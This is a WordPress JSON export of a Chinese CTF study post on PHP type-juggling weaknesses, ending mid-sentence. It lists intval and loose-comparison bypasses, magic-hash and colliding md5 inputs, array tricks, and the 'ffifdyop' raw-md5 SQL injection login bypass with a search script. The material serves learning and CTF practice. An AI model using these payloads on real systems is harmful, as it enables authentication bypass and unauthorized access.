{"id":218,"date":"2021-07-05T06:54:32","date_gmt":"2021-07-04T22:54:32","guid":{"rendered":"http:\/\/101.34.19.194\/?p=218"},"modified":"2021-08-03T19:39:33","modified_gmt":"2021-08-03T11:39:33","slug":"php%e7%89%b9%e6%80%a7","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=218","title":{"rendered":"php\u7279\u6027"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">PHP intval() \u51fd\u6570<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u672c\u7c7b\u578b<\/h3>\n\n\n\n<p><strong>intval()<\/strong> \u51fd\u6570\u7528\u4e8e\u83b7\u53d6\u53d8\u91cf\u7684\u6574\u6570\u503c\u3002<\/p>\n\n\n\n<p><strong>intval()<\/strong> \u51fd\u6570\u901a\u8fc7\u4f7f\u7528\u6307\u5b9a\u7684\u8fdb\u5236 base \u8f6c\u6362\uff08\u9ed8\u8ba4\u662f\u5341\u8fdb\u5236\uff09\uff0c\u8fd4\u56de\u53d8\u91cf var \u7684 integer \u6570\u503c\u3002 intval() \u4e0d\u80fd\u7528\u4e8e object\uff0c\u5426\u5219\u4f1a\u4ea7\u751f E_NOTICE \u9519\u8bef\u5e76\u8fd4\u56de <strong>1<\/strong>\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">int intval ( mixed $var [, int $base = 10 ] )<\/pre>\n\n\n\n<p>\u53c2\u6570\u8bf4\u660e\uff1a<\/p>\n\n\n\n<ul><li>$var\uff1a\u8981\u8f6c\u6362\u6210 integer \u7684\u6570\u91cf\u503c\u3002<\/li><li>$base\uff1a\u8f6c\u5316\u6240\u4f7f\u7528\u7684\u8fdb\u5236\u3002<\/li><\/ul>\n\n\n\n<p>\u5982\u679c base \u662f 0\uff0c\u901a\u8fc7\u68c0\u6d4b var \u7684\u683c\u5f0f\u6765\u51b3\u5b9a\u4f7f\u7528\u7684\u8fdb\u5236\uff1a<\/p>\n\n\n\n<ul><li>\u5982\u679c\u5b57\u7b26\u4e32\u5305\u62ec\u4e86 &#8220;0x&#8221; (\u6216 &#8220;0X&#8221;) \u7684\u524d\u7f00\uff0c\u4f7f\u7528 16 \u8fdb\u5236 (hex)\uff1b\u5426\u5219\uff0c<\/li><li>\u5982\u679c\u5b57\u7b26\u4e32\u4ee5 &#8220;0&#8221; \u5f00\u59cb\uff0c\u4f7f\u7528 8 \u8fdb\u5236(octal)\uff1b\u5426\u5219\uff0c<\/li><li>\u5c06\u4f7f\u7528 10 \u8fdb\u5236 (decimal)\u3002<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u5224\u65ad\u662f\u5426\u4e3aintval<\/h3>\n\n\n\n<p>payload\u5c1d\u8bd5<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>news.php?id=13<\/p><p>news.php?id=1<\/p><p>news.php?id[]=13<\/p><\/blockquote>\n\n\n\n<p>\u52a0\u5165\u540e\u7aefphp\u7684\u51fd\u6570\u4e3a$id=intval($_GET[&#8216;id&#8217;]);<\/p>\n\n\n\n<p>\u90a3\u4e48\u4e24\u4e2apayload\u7684\u56de\u663e\u662f\u4e00\u6837\u7684<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>news.php?id=1<\/p><p>news.php?id[]=13<\/p><\/blockquote>\n\n\n\n<p>\u56e0\u4e3aintval\u51fd\u6570\u7684\u6027\u8d28<code>intval() \u4e0d\u80fd\u7528\u4e8e object\uff0c\u5426\u5219\u4f1a\u4ea7\u751f E_NOTICE \u9519\u8bef\u5e76\u8fd4\u56de 1<\/code><\/p>\n\n\n\n<p>\u5982\u679c\u8fd9\u4e24\u4e2a\u7684payload\u7684\u56de\u663e\u662f\u4e00\u6837\u7684<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>news.php?id=13<\/p><p>news.php?id[]=13<\/p><\/blockquote>\n\n\n\n<p>\u90a3\u4e48\u540e\u7aefphp\u7684\u51fd\u6570\u4e0d\u662fintval<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u7c7b\u578b\u8f6c\u6362\u95ee\u9898<\/h3>\n\n\n\n<p>intval() \u51fd\u6570\u53ef\u4ee5\u5c06\u5b57\u7b26\u4e32string\u7c7b\u578b\u8f6c\u6362\u6210\u6574\u6570int\u7c7b\u578b\u3002(\u53d6\u6574\u51fd\u6570)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">var_dump(intval(4))\/\/4<br>\u200b<br>var_dump(intval(\u20181asd\u2019))\/\/1<br>\u200b<br>var_dump(intval(\u2018asd1\u2019))\/\/0<\/pre>\n\n\n\n<p>\u4e0a\u9762\u4e09\u4e2a\u4f8b\u5b50\u8bf4\u660e\u4e86intval\uff08\uff09\u51fd\u6570\u5728\u8f6c\u6362\u5b57\u7b26\u4e32\u7684\u65f6\u5019\u5373\u4f7f\u78b0\u5230\u4e0d\u80fd\u8f6c\u6362\u7684\u5b57\u7b26\u4e32\u7684\u65f6\u5019\u5b83\u4e5f\u4e0d\u4f1a\u62a5\u9519\uff0c\u800c\u662f\u8fd4\u56de0\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u7ed5\u8fc7\u4f8b\u5b50<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">intval('4476.0')===4476 &nbsp; &nbsp;\u5c0f\u6570\u70b9 &nbsp;<br>intval('+4476.0')===4476 &nbsp; \u6b63\u8d1f\u53f7<br>intval('4476e0')===4476 &nbsp; &nbsp;\u79d1\u5b66\u8ba1\u6570\u6cd5<br>intval('0x117c')===4476 &nbsp; &nbsp;16\u8fdb\u5236<br>intval('010574')===4476 &nbsp; &nbsp;8\u8fdb\u5236<br>intval(' 010574')===4476 &nbsp; 8\u8fdb\u5236+\u7a7a\u683c<br>intval('+010574')===4476 &nbsp; \u6b63\u53f7+8\u8fdb\u5236<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">php\u6bd4\u8f83\u8fd0\u7b97\u7b26<\/h2>\n\n\n\n<p>\u201c= =\u201d\uff1a\u4f1a\u628a\u4e24\u7aef\u53d8\u91cf\u7c7b\u578b\u8f6c\u6362\u6210\u76f8\u540c\u7684\uff0c\u5728\u8fdb\u884c\u6bd4\u8f83\u3002<\/p>\n\n\n\n<p>\u201c= = =\u201d\uff1a\u4f1a\u5148\u5224\u65ad\u4e24\u7aef\u53d8\u91cf\u7c7b\u578b\u662f\u5426\u76f8\u540c\uff0c\u5728\u8fdb\u884c\u6bd4\u8f83\u3002<\/p>\n\n\n\n<p>\u7b80\u5355\u6765\u8bf4\uff0c\u201c===\u201d\u6bd4\u8f83\u4e24\u4e2a\u53d8\u91cf\u7684\u503c\u548c\u7c7b\u578b\uff1b\u201c==\u201d\u6bd4\u8f83\u4e24\u4e2a\u53d8\u91cf\u7684\u503c\uff0c\u4e0d\u6bd4\u8f83\u6570\u636e\u7c7b\u578b\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$a = '123';<br>$b = 123;<br>$a === $b\u4e3a\u5047\uff1b<br>$a == $b\u4e3a\u771f\uff1b<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">\u5b57\u7b26\u4e32\u548c\u6574\u6570<\/h4>\n\n\n\n<p>\u8fd9\u91cc\u660e\u786e\u8bf4\u660e\uff0c\u5728\u4e24\u4e2a\u76f8\u7b49\u7684\u7b26\u53f7\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u4e32\u4e0e\u4e00\u4e2a\u6570\u5b57\u76f8\u6bd4\u8f83\u65f6\uff0c\u5b57\u7b26\u4e32\u4f1a\u8f6c\u6362\u6210\u6570\u503c\u3002<\/p>\n\n\n\n<p>\u4f8b\u5982<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br> var_dump(\"name\"==0); &nbsp;\/\/true<br> var_dump(\"1name\"==1); \/\/true<br> var_dump(\"name1\"==1) \/\/false<br> var_dump(\"name1\"==0) \/\/true<br> var_dump(\"0e123456\"==\"0e4456789\"); \/\/true<br> ?&gt;<\/pre>\n\n\n\n<p>\u5f53\u4e00\u4e2a\u5b57\u7b26\u4e32\u5f53\u4f5c\u4e00\u4e2a\u6570\u503c\u6765\u53d6\u503c\uff0c\u5176\u7ed3\u679c\u548c\u7c7b\u578b\u5982\u4e0b:\u5982\u679c\u8be5\u5b57\u7b26\u4e32\u6ca1\u6709\u5305\u542b<strong>&#8216;.&#8217;,&#8217;e&#8217;,&#8217;E&#8217;<\/strong>\u5e76\u4e14\u5176\u6570\u503c\u503c\u5728\u6574\u5f62\u7684\u8303\u56f4\u4e4b\u5185\uff0c\u8be5\u5b57\u7b26\u4e32\u88ab\u5f53\u4f5cint\u6765\u53d6\u503c\uff0c\u5176\u4ed6\u6240\u6709\u60c5\u51b5\u4e0b\u90fd\u88ab\u4f5c\u4e3afloat\u6765\u53d6\u503c\uff0c\u8be5\u5b57\u7b26\u4e32\u7684<strong>\u5f00\u59cb\u90e8\u5206<\/strong>\u51b3\u5b9a\u4e86<strong>\u5b83\u7684\u503c<\/strong>\uff0c\u5982\u679c\u8be5\u5b57\u7b26\u4e32\u4ee5\u5408\u6cd5\u7684\u6570\u503c\u5f00\u59cb\uff0c\u5219\u4f7f\u7528\u8be5\u6570\u503c\uff0c\u5426\u5219\u5176\u503c\u4e3a0\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u79d1\u5b66\u8ba1\u6570\u6cd5<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0e132456789\"==\"0e7124511451155\" \/\/true<br>\"0e1abc\"==\"0\" &nbsp; &nbsp; \/\/true4219903<\/pre>\n\n\n\n<p>\u5f53\u51fa\u73b0xex\u6a21\u5f0f\u7684\u65f6\u5019\u4ee3\u8868\u79d1\u5b66\u8ba1\u6570\u6cd5\uff0c\u6bd4\u59821e3=1*10\u4e09\u6b21\u65b9\uff0c\u5728\u8fdb\u884c\u6bd4\u8f83\u8fd0\u7b97\u65f6\uff0c\u5982\u679c\u9047\u5230\u4e860e\\d+\uff08\u610f\u601d\u5c31\u662f0e\u5c31\u662f0e\uff0cd+\u7684\u610f\u601d\u662f\u540e\u9762\u5168\u90e8\u662f\u6570\u5b57\uff09\u8fd9\u79cd\u5b57\u7b26\u4e32\uff0c\u5c31\u4f1a\u5c06\u8fd9\u79cd\u5b57\u7b26\u4e32\u89e3\u6790\u4e3a\u79d1\u5b66\u8ba1\u6570\u6cd5\u3002\u6240\u4ee5\u65e0\u8bba0e\u540e\u9762\u662f\u4ec0\u4e48\uff0c0\u7684\u591a\u5c11\u6b21\u65b9\u8fd8\u662f0\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">md5<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">\u5f31\u6bd4\u8f83<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">if (isset($_POST['a']) and isset($_POST['b'])) {<br>if ($_POST['a'] != $_POST['b'])<br>if (md5($_POST['a']) === md5($_POST['b']))<br>echo $flag;<br>else<br>print 'Wrong.';<br>}<\/pre>\n\n\n\n<p>php\u4e2d\uff0cmd5()\u51fd\u6570\u53ea\u80fd\u5904\u7406\u5b57\u7b26\u4e32\u7c7b\u578b<\/p>\n\n\n\n<p><code>md5(string,raw)<\/code> string\u4e3a\u5b57\u7b26\u4e32\uff1braw\u53ef\u9009\uff0c\u89c4\u5b9a\u8f93\u51fa\u683c\u5f0f\uff0cTRUE &#8211; \u539f\u59cb 16 \u5b57\u7b26\u4e8c\u8fdb\u5236\u683c\u5f0f FALSE &#8211; \u9ed8\u8ba4\u300232 \u5b57\u7b26\u5341\u516d\u8fdb\u5236\u6570\u3002<\/p>\n\n\n\n<p>\u5982\u679c\u5904\u7406\u6570\u7ec4\uff0c\u8fd4\u56deNULL\u503c\uff0c\u4e24\u4e2a\u6570\u7ec4\u7ecf\u8fc7md5\u5904\u7406\u540e\u518d\u5f3a\u6bd4\u8f83\u7c7b\u578b\u4e3a\u76f8\u7b49<\/p>\n\n\n\n<p><code>a[]=1&amp;b[]=2<\/code> post\u65b9\u5f0f<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u5f31\u6bd4\u8f83\uff08md5\u7c7b\u578b\u8f6c\u6362\uff09<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">$a=(string)$a;<br>$b=(string)$b;<br>if(  ($a!==$b) &amp;&amp; (md5($a)==md5($b)) ){<br>echo $flag;<br>}<\/pre>\n\n\n\n<p>\u7ed5\u8fc7\uff1a<\/p>\n\n\n\n<p>\u53ea\u9700\u8981\u8f93\u5165\u4e00\u4e2a\u6570\u5b57\u548c\u5b57\u7b26\u4e32\u8fdb\u884cMD5\u52a0\u5bc6\u4e4b\u540e\u90fd\u4e3a0e\u7684\u5373\u53ef\u5f97\u51fa\u7b54\u6848<\/p>\n\n\n\n<p><code>a=240610708&amp;b=QNKCDZO<\/code><\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u5f3a\u6bd4\u8f83<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">$a=(string)$a;<br>$b=(string)$b;<br>if(  ($a!==$b) &amp;&amp; (md5($a)===md5($b)) ){<br>echo $flag;<br>}<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&amp;b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2<\/pre>\n\n\n\n<p>\u8fd9\u4e00\u5927\u957f\u4e32\u7684\u7f16\u7801\uff0c\u4ed6\u4eec\u7684md5\u503c\u662f\u76f8\u7b49\u7684\uff0c\u539f\u7406\u662f\u5c06hex\u5b57\u7b26\u4e32\u8f6c\u5316\u4e3aascii\u5b57\u7b26\u4e32\uff0c\u5e76\u5199\u5165\u5230bin\u6587\u4ef6 \u8003\u8651\u5230\u8981\u5c06\u4e00\u4e9b\u4e0d\u53ef\u89c1\u5b57\u7b26\u4f20\u5230\u670d\u52a1\u5668\uff0c\u8fd9\u91cc\u4f7f\u7528url\u7f16\u7801<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">SQL\u6ce8\u5165\u7ed5\u8fc7<\/h5>\n\n\n\n<p>\u7a81\u7834\u70b9\u5728md5($pass,true)\u8fd9\u91cc\uff0c\u5148\u6765\u770b\u770bmd5\u51fd\u6570\u7684\u7528\u6cd5\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210725104239.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/gitee.com\/hermitaria\/blogimagee\/raw\/master\/20210725104239.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\"\/><\/div><\/figure>\n\n\n\n<p><a href=\"https:\/\/img2020.cnblogs.com\/blog\/1212355\/202003\/1212355-20200320220949836-1952658792.png\"><\/a><\/p>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u7684raw\u53c2\u6570\u662fTrue\uff0c\u610f\u4e3a\u8fd4\u56de\u539f\u59cb16\u5b57\u7b26\u4e8c\u8fdb\u5236\u683c\u5f0f\u3002<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u8bf4\u5982\u679cmd5\u503c\u7ecf\u8fc7hex\u8f6c\u6210\u5b57\u7b26\u4e32\u540e\u4e3a &#8216;or&#8217;+balabala\u8fd9\u6837\u7684\u5b57\u7b26\u4e32\uff0c\u5219\u62fc\u63a5\u540e\u6784\u6210\u7684SQL\u8bed\u53e5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">select * from `admin` where password=''or'balabala'<\/pre>\n\n\n\n<p>\u5f53&#8217;or&#8217;\u540e\u9762\u7684\u503c\u4e3aTrue\u65f6\uff0c\u5373\u53ef\u6784\u6210\u4e07\u80fd\u5bc6\u7801\u5b9e\u73b0SQL\u6ce8\u5165\uff0c\u8fd9\u91cc\u6211\u4eec\u9700\u8981\u77e5\u9053\u7684\u662fMySQL\u7684\u4e00\u4e2a\u7279\u6027\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>\u5728mysql\u91cc\u9762\uff0c\u5728\u7528\u4f5c\u5e03\u5c14\u578b\u5224\u65ad\u65f6\uff0c\u4ee51\u5f00\u5934\u7684\u5b57\u7b26\u4e32\u4f1a\u88ab\u5f53\u505a\u6574\u578b\u6570\u3002<\/p><p>\u8981\u6ce8\u610f\u7684\u662f\u8fd9\u79cd\u60c5\u51b5\u662f\u5fc5\u987b\u8981\u6709\u5355\u5f15\u53f7\u62ec\u8d77\u6765\u7684\uff0c\u6bd4\u5982password=\u2018xxx\u2019 or \u20181xxxxxxxxx\u2019\uff0c\u90a3\u4e48\u5c31\u76f8\u5f53\u4e8epassword=\u2018xxx\u2019 or 1 \uff0c\u4e5f\u5c31\u76f8\u5f53\u4e8epassword=\u2018xxx\u2019 or true\uff0c\u6240\u4ee5\u8fd4\u56de\u503c\u5c31\u662ftrue\u3002<\/p><p>\u5f53\u7136\u5728\u6211\u540e\u6765\u6d4b\u8bd5\u4e2d\u53d1\u73b0\uff0c\u4e0d\u53ea\u662f1\u5f00\u5934\uff0c\u53ea\u8981\u662f\u6570\u5b57\u5f00\u5934\u90fd\u662f\u53ef\u4ee5\u7684\u3002 \u5f53\u7136\u5982\u679c\u53ea\u6709\u6570\u5b57\u7684\u8bdd\uff0c\u5c31\u4e0d\u9700\u8981\u5355\u5f15\u53f7\uff0c\u6bd4\u5982password=\u2018xxx\u2019 or 1\uff0c\u90a3\u4e48\u8fd4\u56de\u503c\u4e5f\u662ftrue\u3002\uff08xxx\u6307\u4ee3\u4efb\u610f\u5b57\u7b26\uff09<\/p><\/blockquote>\n\n\n\n<pre class=\"wp-block-preformatted\">select * from `admin` where password=''or'1abcdefg' &nbsp; &nbsp;---&gt; &nbsp;True<br>select * from `admin` where password=''or'0abcdefg' &nbsp; &nbsp;---&gt; &nbsp;False<br>select * from `admin` where password=''or'1' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ---&gt; &nbsp;True<br>select * from `admin` where password=''or'2' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ---&gt; &nbsp;True<br>select * from `admin` where password=''or'0' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ---&gt; &nbsp;False<\/pre>\n\n\n\n<p><strong>\u53ea\u8981&#8217;or&#8217;\u540e\u9762\u7684\u5b57\u7b26\u4e32\u4e3a\u4e00\u4e2a\u975e\u96f6\u7684\u6570\u5b57\u5f00\u5934\u90fd\u4f1a\u8fd4\u56deTrue<\/strong>\uff0c\u8fd9\u5c31\u662f\u6211\u4eec\u7684\u7a81\u7834\u70b9\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8fd9\u4e2a\u811a\u672c\u6765\u83b7\u5f97\u6ee1\u8db3\u6211\u4eec\u8981\u6c42\u7684\u660e\u6587\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php <br>for ($i = 0;;) { <br> for ($c = 0; $c &lt; 1000000; $c++, $i++)<br> &nbsp;if (stripos(md5($i, true), '\\'or\\'') !== false)<br> &nbsp; echo \"\\nmd5($i) = \" . md5($i, true) . \"\\n\";<br> echo \".\";<br>}<br>?&gt;<br>\u200b<br>\/\/\u5f15\u7528\u4e8e http:\/\/mslc.ctf.su\/wp\/leet-more-2010-oh-those-admins-writeup\/<\/pre>\n\n\n\n<p>\u8fd9\u91cc\u63d0\u4f9b\u4e00\u4e2a\u6700\u5e38\u7528\u7684\uff1a<strong>ffifdyop<\/strong>\uff0c\u8be5\u5b57\u7b26\u4e32md5\u52a0\u5bc6\u540e\u82e5raw\u53c2\u6570\u4e3aTrue\u65f6\u4f1a\u8fd4\u56de <strong>&#8216;or&#8217;6&lt;trash&gt;<\/strong> (&lt;trash&gt;\u5176\u5b9e\u5c31\u662f\u4e00\u4e9b\u4e71\u7801\u548c\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u8fd9\u91cc\u53ea\u8981\u7b2c\u4e00\u4f4d\u662f\u975e\u96f6\u6570\u5b57\u5373\u53ef\u88ab\u5224\u5b9a\u4e3aTrue\uff0c\u540e\u9762\u7684&lt;trash&gt;\u4f1a\u5728MySQL\u5c06\u5176\u8f6c\u6362\u6210\u6574\u578b\u6bd4\u8f83\u65f6\u4e22\u6389)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5341\u516d\u8fdb\u5236\u8f6c\u6362<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0x1e240\"==\"123456\" \/\/true<br>\"0x1e240\"==123456 \/\/true<br>\"0x1e240\"==\"1e240\"\/\/false<\/pre>\n\n\n\n<p>php\u5728\u63a5\u53d7\u4e00\u4e2a\u5e260x\u7684\u5b57\u7b26\u4e32\u7684\u65f6\u5019\uff0c\u4f1a\u81ea\u52a8\u628a\u8fd9\u884c\u5b57\u7b26\u4e32\u89e3\u6790\u6210\u5341\u8fdb\u5236\u7684\u518d\u8fdb\u884c\u6bd4\u8f83\uff0c0x1e240\u89e3\u6790\u6210\u5341\u8fdb\u5236\u5c31\u662f123456\uff0c\u5e76\u4e14\u4e0e\u5b57\u7b26\u4e32\u7c7b\u578b\u7684123456\u548cint\u578b\u7684123456\u90fd\u76f8\u540c\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5e03\u5c14\u503c\u8f6c\u6362\u95ee\u9898<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>If ( true=\u201cname\u201d){<br>echo<br>\u201csuccess\u201d;<br>}<\/pre>\n\n\n\n<p>\u5e03\u5c14\u503c\u53ef\u4ee5\u548c\u4efb\u4f55\u5b57\u7b26\u4e32\u76f8\u7b49<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">php\u6b63\u5219\u5339\u914d<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u6b63\u5219\u8868\u8fbe\u5f0f\u4fee\u9970\u7b26<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>\u4fee\u6b63\u7b26\u53f7<\/th><th>\u529f\u80fd\u63cf\u8ff0<\/th><\/tr><\/thead><tbody><tr><td>i<\/td><td>\u5728\u548c\u6b63\u5219\u5339\u914d\u662f\u4e0d\u533a\u5206\u5927\u5c0f\u5199<\/td><\/tr><tr><td>m<\/td><td>\u5c06\u5b57\u7b26\u4e32\u89c6\u4e3a\u591a\u884c\u3002\u9ed8\u8ba4\u7684\u6b63\u5219\u5f00\u59cb\u201c^\u201d\u548c\u7ed3\u675f\u201c$\u201d\u5c06\u76ee\u6807\u5b57\u6761\u4e32\u4f5c\u4e3a\u4e00\u5355\u4e00\u7684\u4e00\u201c\u884c\u201d\u5b57\u7b26\uff08\u751a\u81f3\u5176\u4e2d\u5305\u62ec\u6362\u884c\u7b26\u4e5f\u662f\u5982\u6b64\uff09\u3002\u5982\u679c\u5728\u4fee\u9970\u7b26\u4e2d\u52a0\u4e0a\u201cm\u201d\uff0c\u90a3\u4e48\u5f00\u59cb\u548c\u7ed3\u675f\u5c06\u4f1a\u6307\u70b9\u5b57\u7b26\u4e32\u7684\u6bcf\u4e00\u884c\u7684\u5f00\u5934\u5c31\u662f\u201c^\u201d\u7ed3\u675f\u5c31\u662f\u201c$\u201d\u3002<\/td><\/tr><tr><td>s<\/td><td>\u5982\u679c\u8bbe\u5b9a\u4e86\u8fd9\u4e2a\u4fee\u6b63\u7b26\uff0c\u90a3\u4e48\uff0c\u88ab\u5339\u914d\u7684\u5b57\u7b26\u4e32\u5c06\u89c6\u4e3a\u4e00\u884c\u6765\u770b\uff0c\u5305\u62ec\u6362\u884c\u7b26\uff0c\u6362\u884c\u7b26\u5c06\u88ab\u89c6\u4e3a\u666e\u901a\u5b57\u7b26\u4e32\u3002<\/td><\/tr><tr><td>x<\/td><td>\u5ffd\u7565\u7a7a\u767d\uff0c\u9664\u975e\u8fdb\u884c\u8f6c\u4e49\u7684\u4e0d\u88ab\u5ffd\u7565\u3002<\/td><\/tr><tr><td>e<\/td><td>\u53ea\u7528\u5728preg_replace()\u51fd\u6570\u4e2d\uff0c\u5728<strong>\u66ff\u6362\u5b57\u7b26\u4e32\u4e2d\u9006\u5411\u5f15\u7528\u505a\u6b63\u5e38\u7684\u66ff\u6362\uff0c\u5c06\u5176(\u5373\u201c\u66ff\u6362\u5b57\u7b26\u4e32\u201d)\u4f5c\u4e3aPHP\u4ee3\u7801\u6c42\u503c\uff0c\u5e76\u7528\u5176\u7ed3\u679c\u6765\u66ff\u6362\u6240\u641c\u7d22\u7684\u5b57\u7b26\u4e32\u3002<\/strong><\/td><\/tr><tr><td>A<\/td><td>\u5982\u679c\u4f7f\u7528\u8fd9\u4e2a\u4fee\u9970\u7b26\uff0c\u90a3\u4e48\u8868\u8fbe\u5f0f\u5fc5\u987b\u662f\u5339\u914d\u7684\u5b57\u7b26\u4e32\u4e2d\u7684\u5f00\u5934\u90e8\u5206\u3002\u6bd4\u5982\u8bf4\u201d\/a\/A\u201d\u5339\u914d\u201dabcd\u201d\u3002<\/td><\/tr><tr><td>D<\/td><td>\u6a21\u5f0f\u4e2d\u7684$\u5b57\u7b26\u6743\u5339\u914d\u76ee\u6807\u5b57\u7b26\u7684\u7ed3\u5c3e\u3002\u6ca1\u6709\u6b64\u9009\u9879\u65f6\uff0c\u5982\u679c\u6700\u540e\u4e00\u4e2a\u5b57\u7b26\u662f\u6362\u884c\u7b26\u7684\u8bdd\uff0c\u7f8e\u5143\u7b26\u53f7\u4e5f\u4f1a\u5339\u914d\u6b64\u5b57\u7b26\u4e4b\u524d\u3002\u5982\u679c\u8bbe\u5b9a\u4e86\u4fee\u6b63\u7b26m\u5219\u5ffd\u7565\u6b64\u9879\u3002<\/td><\/tr><tr><td>E<\/td><td>\u4e0e\u201dm\u201d\u76f8\u53cd\uff0c\u5982\u679c\u4f7f\u7528\u8fd9\u4e2a\u4fee\u9970\u7b26\uff0c\u90a3\u4e48\u201d$\u201d\u5c06\u5339\u914d\u7edd\u5bf9\u5b57\u7b26\u4e32\u7684\u7ed3\u5c3e\uff0c\u800c\u4e0d\u662f\u6362\u884c\u7b26\u524d\u9762\uff0c\u9ed8\u8ba4\u5c31\u6253\u5f00\u4e86\u8fd9\u4e2a\u6a21\u5f0f\u3002<\/td><\/tr><tr><td>U<\/td><td>\u8d2a\u5a6a\u6a21\u5f0f\uff0c\u548c\u95ee\u53f7\u7684\u4f5c\u7528\u5dee\u4e0d\u591a\uff0c\u6700\u5927\u9650\u5ea6\u7684\u5339\u914d\u5c31\u662f\u8d2a\u5a6a\u6a21\u5f0f\u3002<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u8d2a\u5a6a\u6a21\u5f0f<\/p>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u8981\u5339\u914d\u4ee5\u5b57\u6bcd\u201ca\u201d\u5f00\u5934\u5b57\u6bcd\u201cb\u201d\u7ed3\u5c3e\u7684\u5b57\u7b26\u4e32\uff0c\u4f46\u662f\u9700\u8981\u5339\u914d\u7684\u5b57\u7b26\u4e32\u5728\u201ca\u201d\u540e\u9762\u542b\u6709\u5f88\u591a\u4e2a\u201cb\u201d\uff0c\u6bd4\u5982\u201ca bbbbbbbbbbbbbbbbb\u201d\uff0c\u5982\u679c\u4f60\u4f7f\u7528\u4e86\u8d2a\u5a6a\u6a21\u5f0f\uff0c\u90a3\u4e48\u4f1a\u5339\u914d\u5230\u6700\u540e\u4e00\u4e2a\u201cb\u201d\uff0c\u53cd\u4e4b\u53ea\u662f\u5339\u914d\u5230\u7b2c\u4e00\u4e2a\u201cb\u201d\u3002<\/p>\n\n\n\n<p>PHP\u6b63\u5219\u8868\u8fbe\u5f0f\u8d2a\u5a6a\u6a21\u5f0f\u4f7f\u7528\u5b9e\u4f8b\uff1a<\/p>\n\n\n\n<ol><li>\/a.+?b\/<\/li><li>\/a.+b\/U<\/li><\/ol>\n\n\n\n<p>\u5bf9\u6bd4\u4e0d\u4f7f\u7528\u8d2a\u5a6a\u6a21\u5f0f\u7684\u5b9e\u4f8b\u5982\u4e0b\uff1a<\/p>\n\n\n\n<ol><li>\/a.+b\/<\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Array\u7cfb\u5217\u51fd\u6570\u7ed5\u8fc7<\/h2>\n\n\n\n<p>array_search() 